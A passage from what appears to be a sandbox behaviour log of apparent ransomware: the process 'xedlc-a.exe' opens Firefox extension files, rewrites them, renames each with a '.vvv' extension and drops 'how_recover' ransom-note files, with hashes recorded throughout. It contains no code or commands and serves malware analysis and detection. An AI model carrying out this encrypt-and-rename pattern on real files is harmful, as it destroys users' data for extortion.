53710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53711.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
53712.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js.vvv
53713.            ads:
53714.          fid (ads:): 281474976765887
53715.          ntstatus: 0x0
53716.          CreateOptions: 0x0
53717.        file:
53718.          timestamp: 79782
53719.          mode: open
53720.          sequenceNumber: 1217
53721.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
53722.          filesize: 7573
53723.          processinfo:
53724.            pid: 1056
53725.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53726.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53727.            ads:
53728.          fid (ads:): 281474976765889
53729.          ntstatus: 0x0
53730.          CreateOptions: 0x60
53731.        file:
53732.          timestamp: 79865
53733.          mode: close
53734.          sequenceNumber: 1218
53735.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
53736.          filesize: 7998
53737.          md5sum: 13f9f3d1b95970fcae6f14e76feebd86
53738.          sha1sum: c308bde3271469c27c125b0e18d366c7c23fd470
53739.          processinfo:
53740.            pid: 1056
53741.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53742.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53743.            ads:
53744.          fid (ads:): 281474976765889
53745.          ntstatus: 0x0
53746.          CreateOptions: 0x0
53747.        file:
53748.          timestamp: 79878
53749.          mode: rename
53750.          sequenceNumber: 1219
53751.          filesize: 7998
53752.          md5sum: 13f9f3d1b95970fcae6f14e76feebd86
53753.          sha1sum: c308bde3271469c27c125b0e18d366c7c23fd470
53754.          processinfo:
53755.            pid: 1056
53756.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53757.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53758.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
53759.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js.vvv
53760.            ads:
53761.          fid (ads:): 281474976765889
53762.          ntstatus: 0x0
53763.          CreateOptions: 0x0
53764.        file:
53765.          timestamp: 79891
53766.          mode: open
53767.          sequenceNumber: 1220
53768.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
53769.          filesize: 5249
53770.          processinfo:
53771.            pid: 1056
53772.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53773.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53774.            ads:
53775.          fid (ads:): 281474976765860
53776.          ntstatus: 0x0
53777.          CreateOptions: 0x60
53778.        file:
53779.          timestamp: 79971
53780.          mode: close
53781.          sequenceNumber: 1221
53782.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
53783.          filesize: 5678
53784.          md5sum: 848cfff8fdc46e3046403e20ab3d7e22
53785.          sha1sum: 278195def80c4bcad2fa63f6a115843dfcb9bdd0
53786.          processinfo:
53787.            pid: 1056
53788.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53789.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53790.            ads:
53791.          fid (ads:): 281474976765860
53792.          ntstatus: 0x0
53793.          CreateOptions: 0x0
53794.        file:
53795.          timestamp: 79984
53796.          mode: rename
53797.          sequenceNumber: 1222
53798.          filesize: 5678
53799.          md5sum: 848cfff8fdc46e3046403e20ab3d7e22
53800.          sha1sum: 278195def80c4bcad2fa63f6a115843dfcb9bdd0
53801.          processinfo:
53802.            pid: 1056
53803.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53804.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53805.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
53806.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js.vvv
53807.            ads:
53808.          fid (ads:): 281474976765860
53809.          ntstatus: 0x0
53810.          CreateOptions: 0x0
53811.        file:
53812.          timestamp: 80112
53813.          mode: created
53814.          sequenceNumber: 1223
53815.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.txt
53816.          processinfo:
53817.            pid: 1056
53818.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53820.            ads:
53821.          fid (ads:): 281474976778347
53822.          ntstatus: 0x0
53823.          CreateOptions: 0x60
53824.        file:
53825.          timestamp: 80121
53826.          mode: close
53827.          sequenceNumber: 1224
53828.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.txt
53829.          filesize: 2682
53830.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
53831.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
53832.          processinfo:
53833.            pid: 1056
53834.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53836.            ads:
53837.          fid (ads:): 281474976778347
53838.          ntstatus: 0x0
53839.          CreateOptions: 0x0
53840.        file:
53841.          timestamp: 80175
53842.          mode: created
53843.          sequenceNumber: 1225
53844.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.html
53845.          processinfo:
53846.            pid: 1056
53847.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53848.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53849.            ads:
53850.          fid (ads:): 281474976778348
53851.          ntstatus: 0x0
53852.          CreateOptions: 0x60
53853.        file:
53854.          timestamp: 80184
53855.          mode: close
53856.          sequenceNumber: 1226
53857.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.html
53858.          filesize: 9495
53859.          md5sum: 95f596a25dff51b6af2042b1bbe02985
53860.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
53861.          processinfo:
53862.            pid: 1056
53863.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53864.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53865.            ads:
53866.          fid (ads:): 281474976778348
53867.          ntstatus: 0x0
53868.          CreateOptions: 0x0
53869.        file:
53870.          timestamp: 80194
53871.          mode: open
53872.          sequenceNumber: 1227
53873.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
53874.          filesize: 3668
53875.          processinfo:
53876.            pid: 1056
53877.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53878.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53879.            ads:
53880.          fid (ads:): 562949953476265
53881.          ntstatus: 0x0
53882.          CreateOptions: 0x60
53883.        file:
53884.          timestamp: 80203
53885.          mode: close
53886.          sequenceNumber: 1228
53887.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
53888.          filesize: 4094
53889.          md5sum: 9e1c6a336028adfdfd22e31081488466
53890.          sha1sum: fb9df2ccb27c4ff8d79a4949a4a2b8b3cd343489
53891.          processinfo:
53892.            pid: 1056
53893.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53894.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53895.            ads:
53896.          fid (ads:): 562949953476265
53897.          ntstatus: 0x0
53898.          CreateOptions: 0x0
53899.        file:
53900.          timestamp: 80217
53901.          mode: rename
53902.          sequenceNumber: 1229
53903.          filesize: 4094
53904.          md5sum: 9e1c6a336028adfdfd22e31081488466
53905.          sha1sum: fb9df2ccb27c4ff8d79a4949a4a2b8b3cd343489
53906.          processinfo:
53907.            pid: 1056
53908.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53910.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
53911.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js.vvv
53912.            ads:
53913.          fid (ads:): 562949953476265
53914.          ntstatus: 0x0
53915.          CreateOptions: 0x0
53916.        file:
53917.          timestamp: 80232
53918.          mode: open
53919.          sequenceNumber: 1230
53920.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
53921.          filesize: 5370
53922.          processinfo:
53923.            pid: 1056
53924.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53926.            ads:
53927.          fid (ads:): 281474976765886
53928.          ntstatus: 0x0
53929.          CreateOptions: 0x60
53930.        file:
53931.          timestamp: 80356
53932.          mode: close
53933.          sequenceNumber: 1231
53934.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
53935.          filesize: 5790
53936.          md5sum: 86bb14370a6fed2120384827abd3ce8a
53937.          sha1sum: 7d7fc304aff43ba4b4d8c53375b912331ae8d208
53938.          processinfo:
53939.            pid: 1056
53940.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53941.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53942.            ads:
53943.          fid (ads:): 281474976765886
53944.          ntstatus: 0x0
53945.          CreateOptions: 0x0
53946.        file:
53947.          timestamp: 80370
53948.          mode: rename
53949.          sequenceNumber: 1232
53950.          filesize: 5790
53951.          md5sum: 86bb14370a6fed2120384827abd3ce8a
53952.          sha1sum: 7d7fc304aff43ba4b4d8c53375b912331ae8d208
53953.          processinfo:
53954.            pid: 1056
53955.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53956.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53957.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
53958.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js.vvv
53959.            ads:
53960.          fid (ads:): 281474976765886
53961.          ntstatus: 0x0
53962.          CreateOptions: 0x0
53963.        file:
53964.          timestamp: 80384
53965.          mode: open
53966.          sequenceNumber: 1233
53967.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
53968.          filesize: 2103
53969.          processinfo:
53970.            pid: 1056
53971.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53972.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53973.            ads:
53974.          fid (ads:): 281474976765907
53975.          ntstatus: 0x0
53976.          CreateOptions: 0x60
53977.        file:
53978.          timestamp: 80512
53979.          mode: close
53980.          sequenceNumber: 1234
53981.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
53982.          filesize: 2526
53983.          md5sum: 5426268d0b362c7ec02cf1b996202cb0
53984.          sha1sum: 2975a683004a958615a7f60da8b00135c6f77615
53985.          processinfo:
53986.            pid: 1056
53987.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53989.            ads:
53990.          fid (ads:): 281474976765907
53991.          ntstatus: 0x0
53992.          CreateOptions: 0x0
53993.        file:
53994.          timestamp: 80524
53995.          mode: rename
53996.          sequenceNumber: 1235
53997.          filesize: 2526
53998.          md5sum: 5426268d0b362c7ec02cf1b996202cb0
53999.          sha1sum: 2975a683004a958615a7f60da8b00135c6f77615
54000.          processinfo:
54001.            pid: 1056
54002.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54003.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54004.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
54005.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js.vvv
54006.            ads:
54007.          fid (ads:): 281474976765907
54008.          ntstatus: 0x0
54009.          CreateOptions: 0x0
54010.        file:
54011.          timestamp: 80536
54012.          mode: open
54013.          sequenceNumber: 1236
54014.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
54015.          filesize: 31689
54016.          processinfo:
54017.            pid: 1056
54018.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54020.            ads:
54021.          fid (ads:): 281474976765876
54022.          ntstatus: 0x0
54023.          CreateOptions: 0x60
54024.        file:
54025.          timestamp: 80652
54026.          mode: close
54027.          sequenceNumber: 1237
54028.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
54029.          filesize: 32110
54030.          md5sum: 2415183ef558288232620001fae49ebb
54031.          sha1sum: b9ac094b2f4734580c6903ecf53ee67e1e81079d
54032.          processinfo:
54033.            pid: 1056
54034.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54036.            ads:
54037.          fid (ads:): 281474976765876
54038.          ntstatus: 0x0
54039.          CreateOptions: 0x0
54040.        file:
54041.          timestamp: 80665
54042.          mode: rename
54043.          sequenceNumber: 1238
54044.          filesize: 32110
54045.          md5sum: 2415183ef558288232620001fae49ebb
54046.          sha1sum: b9ac094b2f4734580c6903ecf53ee67e1e81079d
54047.          processinfo:
54048.            pid: 1056
54049.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54050.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54051.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
54052.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js.vvv
54053.            ads:
54054.          fid (ads:): 281474976765876
54055.          ntstatus: 0x0
54056.          CreateOptions: 0x0
54057.        file:
54058.          timestamp: 80677
54059.          mode: open
54060.          sequenceNumber: 1239
54061.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
54062.          filesize: 3624
54063.          processinfo:
54064.            pid: 1056
54065.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54066.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54067.            ads:
54068.          fid (ads:): 281474976765890
54069.          ntstatus: 0x0
54070.          CreateOptions: 0x60
54071.        file:
54072.          timestamp: 80686
54073.          mode: close
54074.          sequenceNumber: 1240
54075.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
54076.          filesize: 4046
54077.          md5sum: 424ba45ee7bbc87b15ea2813e5040fa7
54078.          sha1sum: 79d3685cd58e13dc8473e68df03e4b8506101a75
54079.          processinfo:
54080.            pid: 1056
54081.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54082.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54083.            ads:
54084.          fid (ads:): 281474976765890
54085.          ntstatus: 0x0
54086.          CreateOptions: 0x0
54087.        file:
54088.          timestamp: 80700
54089.          mode: rename
54090.          sequenceNumber: 1241
54091.          filesize: 4046
54092.          md5sum: 424ba45ee7bbc87b15ea2813e5040fa7
54093.          sha1sum: 79d3685cd58e13dc8473e68df03e4b8506101a75
54094.          processinfo:
54095.            pid: 1056
54096.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54097.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54098.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
54099.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js.vvv
54100.            ads:
54101.          fid (ads:): 281474976765890
54102.          ntstatus: 0x0
54103.          CreateOptions: 0x0
54104.        file:
54105.          timestamp: 80712
54106.          mode: open
54107.          sequenceNumber: 1242
54108.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
54109.          filesize: 1024
54110.          processinfo:
54111.            pid: 1056
54112.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54113.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54114.            ads:
54115.          fid (ads:): 562949953476243
54116.          ntstatus: 0x0
54117.          CreateOptions: 0x60
54118.        file:
54119.          timestamp: 80722
54120.          mode: close
54121.          sequenceNumber: 1243
54122.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
54123.          filesize: 1454
54124.          md5sum: b4e840953d38c82a388351521ca8dbcb
54125.          sha1sum: 96f02f9f96306a75088b14def205dbe234d33232
54126.          processinfo:
54127.            pid: 1056
54128.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54129.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54130.            ads:
54131.          fid (ads:): 562949953476243
54132.          ntstatus: 0x0
54133.          CreateOptions: 0x0
54134.        file:
54135.          timestamp: 80737
54136.          mode: rename
54137.          sequenceNumber: 1244
54138.          filesize: 1454
54139.          md5sum: b4e840953d38c82a388351521ca8dbcb
54140.          sha1sum: 96f02f9f96306a75088b14def205dbe234d33232
54141.          processinfo:
54142.            pid: 1056
54143.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54144.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54145.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
54146.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js.vvv
54147.            ads:
54148.          fid (ads:): 562949953476243
54149.          ntstatus: 0x0
54150.          CreateOptions: 0x0
54151.        file:
54152.          timestamp: 80750
54153.          mode: open
54154.          sequenceNumber: 1245
54155.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
54156.          filesize: 2266
54157.          processinfo:
54158.            pid: 1056
54159.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54161.            ads:
54162.          fid (ads:): 281474976765885
54163.          ntstatus: 0x0
54164.          CreateOptions: 0x60
54165.        file:
54166.          timestamp: 80759
54167.          mode: close
54168.          sequenceNumber: 1246
54169.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
54170.          filesize: 2686
54171.          md5sum: 6605911e2163e7dc05eee3621db2686f
54172.          sha1sum: 593318d24316db19d63cf6cfef53a19b5d5d9d09
54173.          processinfo:
54174.            pid: 1056
54175.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54177.            ads:
54178.          fid (ads:): 281474976765885
54179.          ntstatus: 0x0
54180.          CreateOptions: 0x0
54181.        file:
54182.          timestamp: 80771
54183.          mode: rename
54184.          sequenceNumber: 1247
54185.          filesize: 2686
54186.          md5sum: 6605911e2163e7dc05eee3621db2686f
54187.          sha1sum: 593318d24316db19d63cf6cfef53a19b5d5d9d09
54188.          processinfo:
54189.            pid: 1056
54190.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54192.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js
54193.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\shims.js.vvv
54194.            ads:
54195.          fid (ads:): 281474976765885
54196.          ntstatus: 0x0
54197.          CreateOptions: 0x0
54198.        file:
54199.          timestamp: 80783
54200.          mode: open
54201.          sequenceNumber: 1248
54202.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
54203.          filesize: 25192
54204.          processinfo:
54205.            pid: 1056
54206.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54207.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54208.            ads:
54209.          fid (ads:): 281474976765875
54210.          ntstatus: 0x0
54211.          CreateOptions: 0x60
54212.        file:
54213.          timestamp: 80907
54214.          mode: close
54215.          sequenceNumber: 1249
54216.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
54217.          filesize: 25614
54218.          md5sum: 759805c17c7ce4670836aad82fe818e7
54219.          sha1sum: 614dc5d4fca73a7297100b3ee632c1bd7666c1d0
54220.          processinfo:
54221.            pid: 1056
54222.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54223.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54224.            ads:
54225.          fid (ads:): 281474976765875
54226.          ntstatus: 0x0
54227.          CreateOptions: 0x0
54228.        file:
54229.          timestamp: 80920
54230.          mode: rename
54231.          sequenceNumber: 1250
54232.          filesize: 25614
54233.          md5sum: 759805c17c7ce4670836aad82fe818e7
54234.          sha1sum: 614dc5d4fca73a7297100b3ee632c1bd7666c1d0
54235.          processinfo:
54236.            pid: 1056
54237.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54239.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js
54240.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tab-browser.js.vvv
54241.            ads:
54242.          fid (ads:): 281474976765875
54243.          ntstatus: 0x0
54244.          CreateOptions: 0x0
54245.        file:
54246.          timestamp: 80932
54247.          mode: open
54248.          sequenceNumber: 1251
54249.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
54250.          filesize: 2112
54251.          processinfo:
54252.            pid: 1056
54253.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
